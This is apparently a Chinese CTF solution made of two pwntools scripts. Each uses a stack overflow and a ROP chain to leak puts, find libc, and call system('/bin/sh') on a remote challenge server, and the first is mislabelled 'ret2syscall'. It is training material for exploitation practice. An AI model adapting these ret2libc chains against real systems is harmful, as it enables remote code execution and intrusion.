两道题都用ret2libc了，最后一道heap0解
ret2syscall

from pwn import*
from LibcSearcher import *
elf=ELF('./pwn')
p = remote('58.240.236.231',49003)
pop_rdi_ret = 0x40072b
ret_addr = 0x400509
main_addr = 0x4006c7
syscall = 0x400741
puts_plt = 0x400520
puts_got = 0x601018

payload = b'a'*64+b'b'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\00'))
log.info("puts addr is :%x"%puts_addr)
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a'*64+b'b'*8 + p64(ret_addr)+ p64(pop_rdi_ret) + p64(0x601048) + p64(system_addr)
p.sendline(payload)
p.interactive()

ret2libc

from pwn import*
import sgtlibc
elf=ELF('./pwn')
p = remote('58.240.236.231',49002)
libc =ELF('libc-2.23.so')
pop_rdi_ret = 0x400783
ret_addr = 0x400509
main_addr = 0x4006FD
puts_plt = 0x400520
puts_got = 0x601018
bss = 0x601060
payload1 = b'a'*208+b'b'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload1)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\00'))
s = sgtlibc.Searcher()
s.add_condition('puts',puts_addr)
s.dump(db_index=3) # search libc , if returns multi-result ,default use index-0's result

system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
puts_addr_ = s.get_address(sgtlibc.s_puts)

print(hex(system_addr), hex(binsh_addr), hex(puts_addr_))
libc_base = puts_addr - puts_addr_
system = libc_base + system_addr
bin_sh = libc_base + binsh_addr

payload2 = b'a'*208+b'b'*8 + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)+ p64(ret_addr)

p.sendlineafter("name:",payload2)
p.interactive()

#LibcSearcher 扫出来的死都不对，气煞我也！